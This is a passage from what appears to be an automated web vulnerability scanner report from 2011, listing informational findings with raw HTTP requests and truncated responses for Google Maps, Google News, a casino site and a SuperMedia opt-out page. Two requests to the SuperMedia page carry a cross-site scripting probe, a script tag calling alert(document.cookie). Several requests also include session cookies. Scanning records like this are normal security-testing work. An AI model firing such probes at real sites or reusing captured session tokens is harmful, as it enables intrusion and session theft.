<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

18.89. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /maps?hl=en&tab=wl HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:55 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=e22038fd07a9a774:TM=1296765175:LM=1296765175:S=HtxbYJyFER0uPLEM; expires=Sat, 02-Feb-2013 20:32:55 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&sa=N&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:103px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

18.90. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /maps?hl\\x3den\\x26tab\\x3dwl\\x22 HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:56 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=be1d5019226b488f:TM=1296765176:LM=1296765176:S=djPZTS07MqJS9tQn; expires=Sat, 02-Feb-2013 20:32:56 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl%5C%5Cx3den%5C%5Cx26tab%5C%5Cx3dwl%5C%5Cx22=&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:103px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

18.91. http://maps.google.com/maps/stk/lc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/stk/lc

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /maps/stk/lc?client=ca-pub-3033999741136561&lc_format=map_inset_ad&ll=41.946689%2C-87.722974&spn=0.009576%2C0.017166&z=15&ads_params=format%3A125x125_as%2Coutput%3Ahtml%2Ch%3A125%2Cw%3A125%2Clmt%3A1296808492%2Cchannel%3A5653360264%2Cad_type%3Atext%2Ccolor_bg%3Ac4d4f3%2Ccolor_border%3Ae5ecf9%2Ccolor_line%3Ac4d4f3%2Ccolor_link%3A0000cc%2Cflash%3A10.1.103%2Curl%3Ahttp%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2Cadsafe%3Ahigh%2Cuiv%3A1%2Cdt%3A1296786892544%2Cshv%3Ar20100101%2Cjsv%3Ar20100101%2Ccorrelator%3A1296786883899%2Cfrm%3A0%2Cadk%3A3364239293%2Cga_vid%3A371918977.1296786866%2Cga_sid%3A1296786866%2Cga_hid%3A132698905%2Cga_fc%3A1%2Cu_tz%3A-360%2Cu_his%3A3%2Cu_java%3A1%2Cu_h%3A1200%2Cu_w%3A1920%2Cu_ah%3A1156%2Cu_aw%3A1920%2Cu_cd%3A16%2Cu_nplug%3A9%2Cu_nmime%3A44%2Cbiw%3A1033%2Cbih%3A1012%2Cfu%3A0%2Cjs%3Auds%2Ceid%3A37464000%2Chl%3Aen HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:33:58 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: maps-stickers
X-XSS-Protection: 1; mode=block
Content-Length: 11529

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000cc;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
/chicago.aspx/x22%26hl%3Den%26client%3Dca-pub-3033999741136561%26adU%3Dwww.Groupon.com/Grand-Rapids%26adT%3DGrand%2BRapids%2BCoupons%26gl%3DUS&amp;usg=AFQjCNHdW81i4P8XUNrcyQK5oMRHwhOhmA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.92. http://mobile.jackpotcity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mobile.jackpotcity.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?vp=jpc403475513 HTTP/1.1
Host: mobile.jackpotcity.com
Proxy-Connection: keep-alive
Referer: http://www.jackpotcity.com/online-casino/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=26101158.471062058.1296765008.1296765008.1296765008.1; __utmb=26101158; __utmc=26101158; __utmz=26101158.1296765008.1.1.utmccn=(referral)|utmcsr=thumbshots.com|utmcct=/Support.aspx|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=1gj5cr2idrfdnk55bux11f55; path=/; HttpOnly
Set-Cookie: CCH=JPM; expires=Sun, 31-Jan-2021 20:30:00 GMT; path=/
Set-Cookie: FCVR=1412626935; expires=Sun, 31-Jan-2021 20:30:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:29:59 GMT
Vary: Accept-Encoding
Content-Length: 53100


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<noscript>
   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="950" height="244" id="gameMenu" align="middle">
   <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
</a> | <a href="https://bank9.valueactive.eu/1569" title="Banking" target="_blank">
Banking</a>
...[SNIP]...
<br />
Know the facts: <a href="http://www.gambleaware.co.uk " title="Gambleware">http://www.gambleaware.co.uk</a>
...[SNIP]...

18.93. http://my.supermedia.com/directoryoptout/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /directoryoptout/?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=1 HTTP/1.1
Host: my.supermedia.com
Proxy-Connection: keep-alive
Referer: http://burp/show/1
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=NLD6ljxjQJDXGQgrK61P3yT1JkXkjgDLb1jBKjgFT6wzymnbnMhk!-550558129!-1173275059; mbox=session#1296759528614-838261#1296763713|check#true#1296761913; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:44:00 GMT
Pragma: no-cache
ntCoent-Length: 24596
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:51:35 GMT;path=/;httponly
Content-Length: 24596


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<li><a href="http://www.inceptor.com/" target="_blank">Search Engine Marketing</a>
...[SNIP]...
<br/>
**Restrictions apply. For a complete description, please see the program
<a href="http://idearcmedia.com/CammsServlet?assetid=10236" target="_blank" class="CallOutLink" title="Terms &amp; Conditions (PDF)">
terms &amp; conditions</a>
...[SNIP]...
<li><a href="http://www.superpages.com">Superpages.com</a>
...[SNIP]...
<li><a href="http://www.switchboard.com">Switchboard.com</a>
...[SNIP]...
<li><a href="http://www.localsearch.com">LocalSearch.com</a>
...[SNIP]...
<li><a href="http://www.everycarlisted.com">EveryCarListed.com</a>
...[SNIP]...
<li><a href="http://www.supertradeexchange.com">SuperTradeExchange.com</a>
...[SNIP]...
<li><a href="http://www.superguarantee.com">SuperGuarantee.com</a>
...[SNIP]...
<li><a href="http://www.directorystore.com">DirectoryStore.com</a>
...[SNIP]...

18.94. http://my.supermedia.com/directoryoptout/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/index.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:15 GMT
Pragma: no-cache
Content-Length: 24548
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:55:52 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<li><a href="http://www.inceptor.com/" target="_blank">Search Engine Marketing</a>
...[SNIP]...
<br/>
**Restrictions apply. For a complete description, please see the program
<a href="http://idearcmedia.com/CammsServlet?assetid=10236" target="_blank" class="CallOutLink" title="Terms &amp; Conditions (PDF)">
terms &amp; conditions</a>
...[SNIP]...
<li><a href="http://www.superpages.com">Superpages.com</a>
...[SNIP]...
<li><a href="http://www.switchboard.com">Switchboard.com</a>
...[SNIP]...
<li><a href="http://www.localsearch.com">LocalSearch.com</a>
...[SNIP]...
<li><a href="http://www.everycarlisted.com">EveryCarListed.com</a>
...[SNIP]...
<li><a href="http://www.supertradeexchange.com">SuperTradeExchange.com</a>
...[SNIP]...
<li><a href="http://www.superguarantee.com">SuperGuarantee.com</a>
...[SNIP]...
<li><a href="http://www.directorystore.com">DirectoryStore.com</a>
...[SNIP]...

18.95. http://news.google.com/nwshp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /nwshp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /nwshp?hl=en&tab=wn HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=PzUqU2EAn4m7rkqQIjeBJQNW_3UV_PRjQb33Q2zzQp1DwmTyQr42E38zMy-8sQJ1LPnUl4sSbXYGZ1twcss2O8veJ-77NgGtxdn5C_egb0UFODVzgr2CD4JcGtOm5BWS;Domain=.google.com;Path=/;Expires=Fri, 05-Aug-2011 20:33:47 GMT;HttpOnly
Date: Thu, 03 Feb 2011 20:33:47 GMT
Expires: Thu, 03 Feb 2011 20:33:47 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=uk&amp;hl=en&amp;topic=h&amp;num=3&amp;output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=uk"><img src="http://www.gstatic.com/news/img/logo/en_uk/news.gif" width="171" height="41" alt="Google News"></a>
...[SNIP]...
<span class="nub"><img src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="spacer"></span>
...[SNIP]...
<span class="nub c-ss"><img src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="spacer"></span>
...[SNIP]...
<span class="title">Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<span class="nub c-w"><img src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="spacer"></span>
...[SNIP]...
<span class="nub c-n"><img src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="spacer"></span>
...[SNIP]...
<span class="nub c-b"><img src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="spacer"></span>
...[SNIP]...
<span class="nub c-t"><img src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="spacer"></span>
...[SNIP]...
<span class="nub c-e"><img src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="spacer"></span>
...[SNIP]...
<span class="nub c-s"><img src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="spacer"></span>
...[SNIP]...
<span class="nub c-m"><img src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="spacer"></span>
...[SNIP]...
<span class="nub c-ir"><img src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="spacer"></span>
...[SNIP]...
<span class="nub c-po"><img src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="spacer"></span>
...[SNIP]...
